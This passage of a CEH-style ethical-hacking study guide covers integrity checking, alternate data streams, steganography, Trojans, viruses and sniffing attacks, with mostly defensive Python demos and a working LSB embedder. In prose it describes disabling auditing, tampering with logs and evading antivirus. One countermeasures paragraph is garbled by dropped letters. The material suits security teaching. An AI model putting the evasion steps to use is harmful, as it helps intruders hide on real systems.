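            if os.path.islink(full) or not os.path.isfile(full):
                continue
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = digest.hexdigest()
    return result


def compare(baseline: dict, current: dict) -> dict:
    """Report what an integrity checker reports: files whose hash changed, new files, files that vanished."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed scenario: baseline a fake sbin/, then replace ps (a user-land rootkit hiding its
    process), drop a new hidden binary and delete netstat. Returns the comparison result."""
    with tempfile.TemporaryDirectory() as root:
        sbin = os.path.join(root, "sbin")
        os.makedirs(sbin)
        originals = {"ls": b"ls-original\n", "ps": b"ps-original\n", "netstat": b"netstat-original\n"}
        for name, body in originals.items():
            with open(os.path.join(sbin, name), "wb") as fh:
                fh.write(body)
        baseline = snapshot(root)   # in practice: taken at install time and kept off the host
        with open(os.path.join(sbin, "ps"), "wb") as fh:
            fh.write(b"ps-trojaned: skips the backdoor's pid\n")
        with open(os.path.join(sbin, ".kit"), "wb") as fh:
            fh.write(b"backdoor\n")
        os.remove(os.path.join(sbin, "netstat"))
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

Because the comparison is on content hashes, a replacement that keeps the original size and timestamps (a common rootkit trick) is still caught; what it cannot catch is a change that was already present when the baseline was taken.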

NTFS Data Streams
An NTFS Alternate Data Stream (ADS) is a second, named stream of data attached to a file. Windows itself uses such streams for metadata, for example document summary information (author, word count) and the zone identifier stamped on downloaded files. ADS makes it possible to fork data into an existing file without changing its functionality, its reported size or its appearance in file-browsing utilities. This allows an attacker to store malicious code on a breached system and execute it without the user noticing. Streams are listed by dir /r on Windows Vista and later, and they are lost when the file is copied to a non-NTFS file system.

What is Steganography?
Steganography is the art and science of writing hidden messages in such a way that no one apart from the sender and intended recipient suspects the existence of the message; it is a form of security through obscurity and should be combined with encryption of the payload. In digital steganography, electronic communications may include steganographic coding inside a transport layer such as a document file, image file, program or protocol. Media files are ideal for steganography because of their large size: subtle changes in a large file can easily go unnoticed.

Steganalysis
The goal of steganalysis is to identify suspected packages, determine whether or not they have a payload encoded into them, and, if possible, recover that payload.
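Steganography and steganalysis together, as an added example that is not part of the original study guide: least-significant-bit embedding of a message into an 8-bit cover, extraction, and the pairs-of-values chi-square statistic (Westfeld and Pfitzmann's attack) that shows why the embedding is detectable. The cover is a constructed pseudo-random byte string standing in for grayscale pixel data, deliberately biased toward even values so the statistic has something to measure; the message is made up.

```python
"""LSB steganography in a constructed 8-bit cover, plus a pairs-of-values chi-square steganalysis statistic."""
import random
import struct


def make_cover(n: int = 4096, seed: int = 1) -> bytes:
    """Constructed cover: a deterministic pseudo 'image' whose samples lean even, standing in for real pixels."""
    rng = random.Random(seed)
    out = bytearray()
    for _ in range(n):
        v = rng.randrange(0, 256)
        if rng.random() < 0.8:
            v &= 0xFE          # bias: most samples forced to even values
        out.append(v)
    return bytes(out)


def embed(cover: bytes, message: bytes) -> bytes:
    """Write a 4-byte length header then the message, one bit per cover byte, into the LSBs."""
    payload = struct.pack(">I", len(message)) + message
    bits = [(b >> i) & 1 for b in payload for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError(f"cover holds {len(cover) // 8} bytes, payload needs {len(payload)}")
    stego = bytearray(cover)
    for idx, bit in enumerate(bits):
        stego[idx] = (stego[idx] & 0xFE) | bit
    return bytes(stego)


def extract(stego: bytes) -> bytes:
    """Read the LSB plane back: the header first, then exactly that many message bytes."""
    def read_bytes(start_bit: int, count: int) -> bytes:
        out = bytearray()
        for i in range(count):
            v = 0
            for j in range(8):
                v = (v << 1) | (stego[start_bit + i * 8 + j] & 1)
            out.append(v)
        return bytes(out)

    (length,) = struct.unpack(">I", read_bytes(0, 4))
    if 32 + length * 8 > len(stego):
        raise ValueError("header claims more data than the carrier holds")
    return read_bytes(32, length)


def pov_statistic(data: bytes) -> float:
    """Pairs-of-values chi-square: LSB embedding pushes the counts of 2k and 2k+1 toward each other,
    so a carrier with a payload scores lower than the untouched cover."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    chi = 0.0
    for k in range(128):
        expected = (counts[2 * k] + counts[2 * k + 1]) / 2
        if expected:
            chi += (counts[2 * k] - expected) ** 2 / expected
    return chi


if __name__ == "__main__":
    cover = make_cover()
    secret = b"meet at the usual place, 0300. " * 8   # constructed message
    stego = embed(cover, secret)
    print(extract(stego) == secret)
    print(round(pov_statistic(cover)), round(pov_statistic(stego)))
```

The statistic only works against sequential LSB embedding in a cover whose value pairs were unbalanced to begin with; scattering the bits pseudo-randomly and filling only a small fraction of the carrier is how practical tools blunt it, which is the arms race the steganalysis paragraph refers to.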

Covering Tracks
- Remove activity tracks: remove web activity tracks such as MRU (Most Recently Used) lists, cookies, cache, temporary files and history
- Disable auditing: use auditpol (Windows) to turn audit categories off so nothing further is logged
- Tamper with log files: modify event log files, server log files and proxy log files by log poisoning or flooding
- Close all remote connections to the victim machine
- Close any opened port
From the defender's side, forwarding logs to a central server means the local copy is not the only copy, and auditing being switched off is itself an event worth alerting on.

Module 6 Trojans and Backdoors Study Guide

Objectives:
- What is a Trojan?
- Overt and Covert Channels
- Purpose of Trojans
- Indications of a Trojan Attack
- Common Ports Used by Trojans
- How to Infect Systems Using Trojans
- Types of Trojans
- How to Detect Trojans
- Evading Anti-Virus Techniques
- Trojan and Backdoor Countermeasures

What is a Trojan?
A Trojan is malicious software disguised as a legitimate piece of software; in the CEH material the term is used mainly for remote access tools delivered that way. What sets these Trojans apart from viruses and worms is that they do not spread on their own but "phone home" and allow a hacker to access the system in real time.

Overt and Covert Channels
Overt channels are those used for legitimate data traffic, such as HTTP traffic over port 80. Covert channel communication takes place over channels that are not intended for data traffic, or by hiding information that violates security policy inside an overt channel (command traffic in DNS queries or ICMP payloads, for example).

Purpose of Trojans
Trojans allow a hacker to control a compromised computer just as if they had physical access. They can be used to obtain sensitive information such as passwords, or to open a computer further for other attacks. Trojans are a multi-purpose tool of hackers, used for many different types of attacks. An attacker may use a Trojan for a specific purpose or for going after specific information. It is also possible to use a Trojan for information gathering at first and then make the compromised system available to other hackers for use as a zombie or proxy.

Indications of a Trojan Attack
Almost any odd or unexpected behavior of a system could be linked to infiltration by a Trojan. Many Trojans also have the ability to kill Task Manager and msconfig in order to keep their processes from being disabled. The only guaranteed method of removing a Trojan is to reinstall the OS from known-good media.

Common Ports Used by Trojans
In the past Trojans used specific ports, such as 31337 for Back Orifice and 12345 for NetBus; lists of these ports are easy to find with a Google search. It is now common, however, for Trojans to use ordinary ports such as 80 and 443 in a covert manner, so a port number alone no longer identifies them.

How to Infect Systems Using Trojans
When a Trojan is written, the malicious code is inserted into some sort of wrapper that disguises it as something benign, like a harmless .jpg file or a simple game. Once the Trojan is wrapped it can be placed on a website to be downloaded, emailed as an attachment, or placed on a USB stick or CD. A CD or USB stick can be configured to autorun, so that when an attacker intentionally leaves media for others to find, the person who finds it will try to see what is on that mysterious CD or USB stick and unknowingly install the attacker's Trojan. The possibilities are endless.

Types of Trojans
Trojans can be used over many different protocols, are delivered in numerous ways, and can be written with pinpoint target accuracy. These many faces of Trojans represent the different types listed in the CEH courseware.
By method, Trojans that use a specific means of communication or deployment: VNC, HTTP/HTTPS, ICMP, command shell, document, covert channel, email, FTP, spam
Trojans that have specific targets: credit card Trojans, e-banking Trojans, mobile Trojans, Mac OS X Trojans
Trojans that have a specific payload or create a payload: data hiding (encrypts data and sometimes ransoms the ability to decrypt it back to the victim: ransomware), destructive, botnet Trojan, proxy server Trojan, defacement Trojan

How to Detect Trojans
Detecting Trojans relies on having a baseline to compare suspicious behavior against. Trojans can cause suspicious traffic on open ports, create registry entries (Run keys for persistence, for instance), files and folders, or show up as newly installed programs. The CEH expects you to be familiar with these activities.

Evading Anti-Virus Techniques
Anti-malware software attempts to identify Trojans by wrapper signature or by code signature. A Trojan writer can avoid leaving a known signature by using a self-written wrapper or Trojan. By changing the code itself it appears different while still accomplishing the goal of the Trojan. A Trojan can also be broken into multiple pieces for deployment and then reassembled on the victim to evade detection.

Trojan and Backdoor Countermeasures
Trojans are an insidious threat. The most innocent-looking file or program could be hiding a malicious payload. Trojans fit the idea of "They are everyone, and they are no one." The only sure-fire way of avoiding compromise is to not connect to the Internet; even then you could be compromised, but the Trojan would be unable to phone home. Common Trojans can be detected by anti-malware software, but a personally written one will not always be caught. Trojans may be detected by looking for suspicious port activity or files, but they may hide in common port traffic or inject into other files. Education about the risk Trojans pose increases awareness and decreases the likelihood of dangerous behavior like downloading files from the Internet and viewing unknown email attachments. However, Trojans may be hidden in critical business components or on websites that are commonly used, so egress filtering and monitoring of outbound connections are needed to catch what user awareness misses.

Module 7 Viruses and Worms Study Guide

Objectives:
- Introduction to Viruses
- Stages of Virus Life
- How a Virus Works
- Virus Analysis
- Types of Viruses
- Writing a Simple Virus Program
- Computer Worms
- Worm Analysis
- What is a Sheep Dip Computer
- Malware Analysis Procedure
- Virus Detection Methods
- Virus and Worm Countermeasures
- Anti-Virus Tools
- Penetration Testing for Viruses

Introduction to Viruses
A virus is a self-replicating program that spreads by attaching copies of itself to other executable code. A true virus can spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD or USB drive. Some viruses affect computers as soon as their code is executed; others lie dormant until a predetermined logical condition is met.

Stages of Virus Life
Design - developing the virus code using programming languages or construction kits
Replication - the virus replicates for a period of time within the target system and then spreads itself
Launch - it gets activated when the user performs certain actions, such as running an infected program
Detection - the virus is identified as a threat infecting target systems
Incorporation - anti-virus software developers assimilate defenses against the virus
Elimination - users install anti-virus updates and eliminate the virus threat

How a Virus Works
Infection phase - the virus replicates itself and attaches to an .exe file in the system. Some viruses infect every time they are run and executed completely; others infect only when users trigger them, which can be a day, a time or a particular event.
Attack phase - some viruses have trigger events to activate and corrupt systems. Some have bugs that replicate and perform activities such as file deletion and decreasing the session's time. Some corrupt targets only after spreading completely, as intended by their developers.

Virus Analysis
Why are viruses created?
- To inflict damage on competitors
- Financial benefit
- Research projects
- For pranks
- Vandalism
- Cyber terrorism
- Distribution of political messages

How are computers infected?
- Opening infected email attachments
- Not running the latest anti-virus software
- Not updating and installing new versions of plug-ins
- Installing pirated software
- Accepting files and downloads without checking the source properly

Indications of a virus attack
- Processes take more resources and time
- Computer slows when programs start
- Files and folders are missing
- Hard drive is accessed often
- Unable to load the OS
- Anti-virus alerts
- Browser window freezes

Virus Hoaxes - There are a lot of viruses out there, and then there are some viruses that are not really out there at all. Hoax virus warning messages are more than annoyances. After repeatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real and truly destructive virus.

Types of Viruses
System or Boot Sector Viruses - move the MBR to another location on the hard disk and copy themselves to the original location of the MBR. When the system boots, the virus code is executed first and then control is passed to the original MBR.

File Viruses - infect executable files by inserting their code into some part of the original file so that the malicious code is executed when the file is accessed. An overwriting file virus overwrites the original file entirely, replacing it with the malicious code. File-infecting viruses have targeted a range of operating systems, including Macintosh, UNIX, DOS and Windows. Overwriting viruses cause irreversible damage to the files.
Example: Loveletter, which operated as an email worm, file virus and Trojan downloader, is a notorious example of a file-overwriting virus. Loveletter searched for certain file types and overwrote them with its own malicious code, permanently destroying the contents of those files. Files affected by an overwriting virus cannot be disinfected and instead must be deleted and restored from backup.

Multipartite Viruses - attempt to attack both the boot sector and executable or program files at the same time.
Example: Ghostball, which infected both executable .COM files and boot sectors.

Macro Viruses - infect files created by Microsoft Word or Excel. Most are written in Visual Basic for Applications (VBA). Macro viruses infect templates or convert infected documents into template files while maintaining their appearance as ordinary document files.
Example: The Melissa virus spread through the word processors Microsoft Word 97 and Word 2000, and also Microsoft Excel 97, 2000 and 2003. It could mass-mail itself from the email client Microsoft Outlook 97 or Outlook 98. If a Word document containing the virus, either LIST.DOC or another infected file, is downloaded and opened, the macro in the document runs and attempts to mass-mail itself. When the macro mass-mails, it collects the first 50 entries from the alias list or address book and sends itself to the email addresses in those entries.

Cluster Viruses - associate themselves with the execution of programs by modifying directory table entries so that the virus itself starts when any program on the computer is started. If infected with a cluster virus it appears as if every program on the system is infected; however, the cluster virus is only in one place on the system.

Stealth / Tunneling Viruses - actively hide from anti-virus software, either by masking the size of the file they hide in or by temporarily removing themselves from the infected file. The virus places a copy of itself in another location on the drive and, while a scan runs, replaces the infected file with an uninfected one that it has stored on the hard drive.

Encryption Viruses - use encryption to mask their code. The body is encrypted with a different key for each infected file, so AV scanners cannot directly detect these viruses by signature alone; the small decryptor stub stays constant, however, and is what signatures are written against.

Polymorphic Code - uses encryption to transform its code into an alternate, encrypted form. To execute, a polymorphic virus must decrypt itself back to its original form; it then mutates with new encryption and a rewritten decryptor. To enable the polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or Encrypted Mutation Engine). A well-written polymorphic virus has no parts that stay the same on each infection.

Metamorphic Viruses - actually make direct changes to their code, permanently altering it between each iteration. The code changes performed by a metamorphic virus are directed by a metamorphic engine, which may itself be altered between iterations. This is the counterpart to a polymorphic virus's polymorphic engine. The alterations in code carried out by a metamorphic virus make it much harder for traditional signature-based antivirus programs to identify two separate iterations as one and the same virus. Fortunately, the technical challenges involved in creating a functioning metamorphic virus are quite high, making them very rare.

File Overwriting or Cavity Viruses - A cavity virus attempts to install itself inside the file it is infecting. This is difficult to do. Most viruses take the easy way out when infecting files: they simply attach themselves to the end of the file and then change the start of the program so that it first points to the virus and then to the actual program code. Many viruses that do this also implement some stealth technique so you don't see the increase in file length while the virus is active in memory. A cavity virus, on the other hand, attempts to be clever. Some program files, for a variety of reasons, have empty space inside them. This empty space can be used to house virus code. A cavity virus attempts to install itself in this empty space without damaging the actual program. An advantage is that the virus then does not increase the length of the program and can avoid the need for some stealth techniques. Example: Lehigh virus.

Sparse Infector Viruses - These infect only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range, so that they are noticed less often.

Companion / Camouflage Viruses - Instead of modifying an existing file, these viruses create a new program which (unknown to the user) is executed instead of the intended program. On exit, the new program executes the original program so that things appear normal. On PCs this has usually been accomplished by creating an infected .COM file with the same name as an existing .EXE file, since DOS runs the .COM first. Integrity-checking antivirus software that only looks for modifications to existing files will fail to detect such viruses.

Shell Viruses - Virus code forms a shell around the target host program's code, making itself the original program and the host code its subroutine. Almost all boot program viruses are shell viruses.

File Extension Viruses - These viruses exploit the file extension: a file named document.txt.exe is shown as document.txt when extensions are hidden, so the user runs an executable believing it to be a text file. A countermeasure is to turn off "Hide extensions for known file types" in Windows.

Add-on and Intrusive Viruses - Add-on viruses append their code to the host code without altering it, either relocating the host code or inserting their own code at the beginning. Intrusive viruses overwrite the host code, partly or completely, with viral code.

Transient and Terminate-and-Stay-Resident Viruses - A transient virus runs only while its infected host runs: it takes control when the host code executes, selects the next target program to be modified and corrupted, and then hands control back. A Terminate and Stay Resident (TSR) virus remains in memory during the entire work session, even after the target host program has executed and terminated, and can only be removed by rebooting the system.

Writing a Simple Virus Program - There are many virus makers (construction kits) available to the public, and most of them require no technical knowledge to create a virus.

Computer Worms - Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system. Attackers can use worm payloads to install backdoors on infected computers, which in turn makes them susceptible to becoming zombies. As zombies they become part of a botnet used to carry out further cyber-attacks, controlled by the worm author or whoever they sell the botnet to.

Worm Analysis - Conficker Worm
The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067, the Windows Server service) on Windows 2000, Windows XP, Windows Vista, Windows Server 2003, Windows Server 2008, and the Windows Server 2008 R2 Beta. While Windows 7 may have been affected by this vulnerability, the Windows 7 Beta was not publicly available until January 2009. Although Microsoft released an emergency out-of-band patch on October 23, 2008 to close the vulnerability, a large number of Windows PCs (estimated at 30%) remained unpatched as late as January 2009. A second variant of the worm, discovered in December 2008, added the ability to propagate over LANs through removable media and network shares. Researchers believe that these were decisive factors in allowing the worm to propagate quickly: by January 2009, the estimated number of infected computers ranged from almost 9 million to 15 million. More recent estimates of the number of infected computers have been notably more difficult because of changes in the propagation and update strategy of later variants of the worm.

What is a Sheep Dip Computer?
A sheep dip is the process of checking physical media, such as floppy disks or CD-ROMs, for viruses before they are used in a computer. Typically, the computer that does the sheep dipping is used only for that purpose and nothing else, and it is isolated from the other computers, meaning it is not connected to the network. Most sheep dips use at least two different antivirus programs in order to increase effectiveness. The goal of sheep dipping is to block viruses from entering systems, rather than waiting until they manifest on user workstations, by which time they will already have done their damage.

Anti-Virus Sensor Systems
Anti-virus sensor systems are a collection of software packages that detect and analyze malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.

Malware Analysis Procedure
Preparing the Test Bed
. Install VMware or Virtual PC on the system
. Install the guest OS into the virtual machine
. Isolate the system from the network (no route from the guest to production or the Internet)
. Disable shared folders and guest isolation features (drag-and-drop, clipboard sharing)
. Copy the malware over to the guest OS
Note - At least two machines should be used. One machine hosts the malicious binary (victim machine) and the other is for baselining and sniffing the network traffic (sniffer machine). They should be networked in such a way that each of them is able to sniff the other's network traffic.

Virus Detection Methods
Scanning - Once a virus has been detected and analyzed, scanning programs can be written that look for the signature strings characteristic of that virus.
Integrity Checking - These products work by reading the entire disk and recording integrity data (hashes) that act as a signature for files and system sectors; later runs report anything whose hash no longer matches.
Interception - The interceptor monitors the operating system requests that are written to the disk (and other suspicious requests, such as a program trying to stay resident) and asks before allowing them.

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Virus and Worm Countermeasures Install anti-virus software that detects and removes infections as they appear Generate an anti-virus policy for safe computing, and distribute it to the staff Pay attention to the instructions while downloading files or any programs from t he Internet Update the anti-virus software on a monthly basis, allowing it to identify and c lean new bugs Avoid opening the attachments received from an un nown sender as viruses spread via e-mail attachments The possibility of virus infection may corrupt data, thus regularly maintain dat a bac -ups Schedule regular scans for all drives after the installation of anti-virus softw are Do not accept dis s or programs without scanning them with anti-virus software f irst

AntiVirus Tools
AVG Antivirus, BitDefender, Kaspersky, Trend Micro, Norton AntiVirus, Avast

Penetration Testing for Viruses
. Install anti-virus on the network infrastructure and on the end users' systems
. Update the anti-virus so that its virus database covers newly identified viruses
. Scan the system, which helps to repair damage or delete files infected with viruses
. If the virus is not removed, go into safe mode and delete the infected files manually
. If any suspicious process, registry entry, startup program, or service is discovered, check the associated executable files
. Check the startup programs and determine whether all of them can be recognized as having known functions
. Check the data files for modification or manipulation by opening several files and comparing their hash values with pre-computed hashes
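The following Python is an added example, not code from the study guide, showing the two detection methods described above side by side: a signature scan and a hash-based integrity check, run against stand-in program files constructed in a temporary directory. The signature bytes and file names are made up (no real malware pattern is used). It also shows why the encryption viruses described earlier defeat the signature scanner but not the integrity check: a third file receives an XOR-encoded copy of the same bytes with a per-file key.

```python
import hashlib
import os
import tempfile

# Constructed signature: a made-up byte string standing in for a virus signature.
SIGNATURES = {
    "EXAMPLE.Test": b"EXAMPLE-SIGNATURE-BYTES",
}


def scan_file(path, signatures=SIGNATURES):
    """Signature scanning: return the names of all signatures present in the file."""
    with open(path, "rb") as f:
        data = f.read()
    return [name for name, sig in signatures.items() if sig in data]


def sha256_of(path):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """Integrity checking, step 1: record a hash of every file on a known-clean system."""
    return {p: sha256_of(p) for p in paths}


def check_baseline(baseline):
    """Integrity checking, step 2: report files that are missing or whose hash changed."""
    return [p for p, expected in baseline.items()
            if not os.path.exists(p) or sha256_of(p) != expected]


def xor_encode(data, key):
    """Stand-in for the per-file encryption an encryption virus applies to its body."""
    return bytes(b ^ key for b in data)


def demo():
    """Constructed scenario: three stand-in programs, two of them later modified."""
    tmp = tempfile.mkdtemp()
    names = ["notepad.exe", "calc.exe", "paint.exe"]
    paths = {n: os.path.join(tmp, n) for n in names}
    for p in paths.values():
        with open(p, "wb") as f:
            f.write(b"MZ" + b"\x00" * 64)      # harmless placeholder content
    baseline = build_baseline(list(paths.values()))

    sig = SIGNATURES["EXAMPLE.Test"]
    with open(paths["calc.exe"], "ab") as f:   # plain appending infector
        f.write(sig)
    with open(paths["paint.exe"], "ab") as f:  # "encrypted" body with a per-file key
        f.write(xor_encode(sig, 0x5A))

    return {
        "scan_hits": {n: scan_file(p) for n, p in paths.items()},
        "changed": sorted(os.path.basename(p) for p in check_baseline(baseline)),
    }


if __name__ == "__main__":
    print(demo())
```

Running demo() reports a signature hit only on calc.exe, while the integrity check lists both calc.exe and paint.exe; the encoded copy has no fixed byte pattern for the scanner to match, but it still changed the file's hash. That is the reason the guide pairs the two methods rather than relying on signatures alone.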


Module 8 Sniffers Study Guide
Objectives:
. Lawful Intercept
. Sniffing Threats
. Types of Sniffing
. Hardware Protocol Analyzers
. MAC Attacks
. DHCP Attacks
. ARP Poisoning Attacks
. Spoofing Attacks
. Sniffing Tools
. Countermeasures

Lawful Intercept
Lawful Intercept is the policy of allowing a Law Enforcement Agency (LEA) to obtain records of data transmissions across traditional communication lines through wiretaps, and also through Internet services for voice and data, with a proper judicial order. This information is provided to the LEA after the service provider has received such an order.

Sniffing Threats
Monitoring traffic in a network environment is called sniffing. Using hardware or software to capture traffic, an attacker can read any data sent in plaintext: web traffic, email, passwords transmitted by protocols that use plain text, and other traffic. Sniffing relies on having access to the network segment that carries the traffic, either physically (a tap, a mirror port) or as a host on that segment.

Types of Sniffing
Passive Sniffing - Passive sniffing is monitoring packets on a network segment that is not switched or bridged, so that every frame can be seen by all machines on that segment. Hubs are outdated, which makes them a rare find, but it is still possible to sniff wireless networks or networks with compromised switches. Any network card set to promiscuous mode and connected to an open network segment can read all the connected devices' traffic, because the traffic is not switched and the same data is sent to all ports.
Active Sniffing - In today's switch-based network environments, an attacker injects packets into the network traffic to get a desired effect, typically to make the switch or the hosts send traffic to the attacker. This is active because you are actually causing a change instead of watching what occurs.

Hardware Protocol Analyzers
OSI Model Vulnerable Protocols: Telnet, HTTP, SMTP, NNTP, POP, FTP, IMAP
These protocols are vulnerable because they send some or all of their information in plain text. A sniffer captures frames at the Data Link Layer (Layer 2 of the OSI model), so it sees the complete contents of every frame regardless of what the upper layers intended; any credential or data that the higher-layer protocol did not encrypt can be read straight out of the capture.
Hardware protocol analyzers are special equipment that monitor network traffic across a cable without altering it and allow precise reading of that traffic. Connecting such a device to the SPAN (mirror) port of a switch, which is configured to receive a copy of the packets sent across the switch, allows capture and monitoring of all the connections to that switch.

MAC Attacks
MAC Flooding - This attack occurs when a switch is bombarded with frames carrying different source MAC addresses. The Content Addressable Memory (CAM) table is of a small, fixed size; when it fills, the switch can no longer keep track of where hosts are and begins to flood traffic for unknown destinations out of all ports, like a hub, so the attacker's port receives other hosts' traffic.
To defend against this, some switches can limit the number of MAC addresses that may be learned on ports connected to end stations (port security). An AAA (Authentication, Authorization, and Accounting) server can also be used to authenticate discovered MAC addresses, for example through 802.1X.
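To make the CAM-table failure mode concrete, here is a small Python model of a learning switch, written for this guide rather than taken from the module or from any vendor. The table size, port numbers and MAC addresses are made up; the point is to watch where a frame addressed to the victim goes after the attacker has filled the table, first without and then with a per-port MAC limit (the port-security countermeasure described above).

```python
import random
from collections import OrderedDict


class Switch:
    """Toy learning switch with a fixed-size CAM table (constructed model).

    Real switches differ in table size and eviction policy, but the failure
    mode is the same: once the table cannot hold a destination, frames for it
    are flooded out of every port, including the attacker's.
    """

    def __init__(self, ports, cam_size, max_macs_per_port=None):
        self.ports = list(ports)
        self.cam = OrderedDict()                    # MAC -> port, oldest first
        self.cam_size = cam_size
        self.max_macs_per_port = max_macs_per_port  # port-security limit, if any
        self.violations = []                        # (port, MAC) of dropped frames
        self.flooded = 0

    def _macs_on(self, port):
        return sum(1 for p in self.cam.values() if p == port)

    def forward(self, src_mac, dst_mac, in_port):
        """Learn src_mac on in_port, then return the list of egress ports."""
        if src_mac not in self.cam:
            limit = self.max_macs_per_port
            if limit is not None and self._macs_on(in_port) >= limit:
                self.violations.append((in_port, src_mac))
                return []                           # port security drops the frame
            if len(self.cam) >= self.cam_size:
                self.cam.popitem(last=False)        # table full: evict oldest entry
            self.cam[src_mac] = in_port
        out = self.cam.get(dst_mac)
        if out is None:                             # unknown destination: flood
            self.flooded += 1
            return [p for p in self.ports if p != in_port]
        return [] if out == in_port else [out]      # known destination: unicast


def random_mac(rng):
    return ":".join(f"{rng.randrange(256):02x}" for _ in range(6))


def mac_flood_demo(port_security=None, seed=1):
    """Victim on port 2, server on port 1, attacker flooding from port 3."""
    rng = random.Random(seed)
    sw = Switch(ports=[1, 2, 3], cam_size=64, max_macs_per_port=port_security)
    victim, server = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:01"
    sw.forward(victim, server, in_port=2)           # switch learns the victim
    sw.forward(server, victim, in_port=1)           # and the server
    for _ in range(500):                            # attacker: 500 bogus source MACs
        sw.forward(random_mac(rng), "ff:ff:ff:ff:ff:ff", in_port=3)
    out_ports = sw.forward(server, victim, in_port=1)   # server now sends to victim
    return {
        "out_ports": out_ports,
        "attacker_sees_it": 3 in out_ports,
        "port_security_violations": len(sw.violations),
        "cam_entries": len(sw.cam),
    }


if __name__ == "__main__":
    print("no port security:", mac_flood_demo())
    print("max 2 MACs/port: ", mac_flood_demo(port_security=2))
```

Without a limit, the victim's entry is evicted by the bogus addresses and the server's frame is flooded to ports 2 and 3, so the attacker on port 3 reads it. With at most two MACs per port, the attacker's third and later frames are counted as violations and dropped, the table stays small, and the frame is delivered to port 2 only.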

DHCP Attacks
Dynamic Host Configuration Protocol (DHCP) lets new hosts join a network easily; that convenience is what makes it insecure. It is important to remember that attacks against DHCP take advantage of functionality that is permitted, but use it in a manner that was not intended.
DHCP Starvation - A Denial of Service attack against a DHCP implementation. The attacker sends requests (with forged client MAC addresses) for the entire DHCP scope instead of just one address, leaving no leases for anyone else and keeping other clients from joining the network.
Rogue DHCP - An attacker runs a DHCP server for the same scope as the legitimate server, causing users to take their configuration from the rogue. By handing out its own address as default gateway or DNS server, the rogue can eavesdrop on the users or intercept their requests and send them to malicious sites. Starvation is often run first so that the legitimate server has nothing left to offer.
DHCP Attack Countermeasures - DHCP attacks can be countered at the switch level (DHCP snooping): DHCP server replies are accepted only on ports that lead to trusted servers, and client requests can be rate-limited per port.

ARP Poisoning Attacks
The Address Resolution Protocol maps an IP address to the physical (MAC) address recognized on the local network. Networked devices keep an ARP table (cache) containing this information. When the MAC address for an IP is not found in the table, an ARP request is broadcast; when an answer arrives, the machine updates the table with the address pair, allowing communication. ARP has no authentication, so a host will accept a reply it never asked for.
ARP spoofing occurs when these packets are forged. Forged replies can fill the ARP table, similar to a MAC flood attack, or poison it with fictitious entries to enable snooping: the attacker's MAC is paired with the gateway's IP on the victim and with the victim's IP on the gateway, so both directions of traffic pass through the attacker. Using these fake ARP messages an attacker can divert communication to compromise a user or system.
The ARP table can be bound to ports on the switch (Dynamic ARP Inspection checked against the DHCP snooping binding table, or static entries for critical hosts such as the gateway) to counter ARP poisoning.
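Here is an added Python example, not part of the module, of the detection side of ARP poisoning. It replays a constructed list of ARP replies (made-up addresses) the way arpwatch or a switch's binding table would see them, flags any change to a known IP-to-MAC pairing, and reports any MAC that claims more than one IP, which is what a man-in-the-middle sitting between a workstation and its gateway looks like. The optional trusted dictionary plays the role of a static entry for the gateway. The same binding check is what the MAC-spoofing countermeasure in the next section relies on.

```python
# Constructed ARP replies as (time, sender_ip, sender_mac): made-up addresses
# standing in for what a sniffer on the segment would capture.
ARP_REPLIES = [
    (1, "192.168.1.1", "00:11:22:33:44:01"),    # gateway
    (2, "192.168.1.10", "00:11:22:33:44:10"),   # workstation
    (3, "192.168.1.1", "00:11:22:33:44:01"),    # gateway again, unchanged
    (9, "192.168.1.1", "de:ad:be:ef:00:01"),    # gateway IP now claimed by another MAC
    (10, "192.168.1.10", "de:ad:be:ef:00:01"),  # same MAC also claims the workstation
    (11, "192.168.1.1", "00:11:22:33:44:01"),   # real gateway answers again (flapping)
]


def detect_arp_poisoning(replies, trusted=None):
    """Return (alerts, multi_claims) for a sequence of ARP replies.

    trusted: dict of IP -> MAC that must never change, playing the role of a
    static ARP entry or a switch IP-MAC binding. Other bindings are learned
    from the first reply seen, as a real ARP cache would learn them.
    """
    trusted = dict(trusted or {})
    bindings = dict(trusted)
    alerts = []
    for ts, ip, mac in replies:
        known = bindings.get(ip)
        if known is None:
            bindings[ip] = mac                    # first sighting: learn it
        elif known != mac:
            alerts.append({"time": ts, "ip": ip, "old_mac": known, "new_mac": mac})
            if ip not in trusted:
                bindings[ip] = mac                # follow the change so flapping is visible

    # One MAC answering for several IPs is the classic poisoning signature.
    claims = {}
    for _, ip, mac in replies:
        claims.setdefault(mac, set()).add(ip)
    multi_claims = {m: sorted(ips) for m, ips in claims.items() if len(ips) > 1}
    return alerts, multi_claims


if __name__ == "__main__":
    alerts, multi = detect_arp_poisoning(ARP_REPLIES)
    for a in alerts:
        print(f"t={a['time']}: {a['ip']} moved {a['old_mac']} -> {a['new_mac']}")
    print("MACs claiming several IPs:", multi)
```

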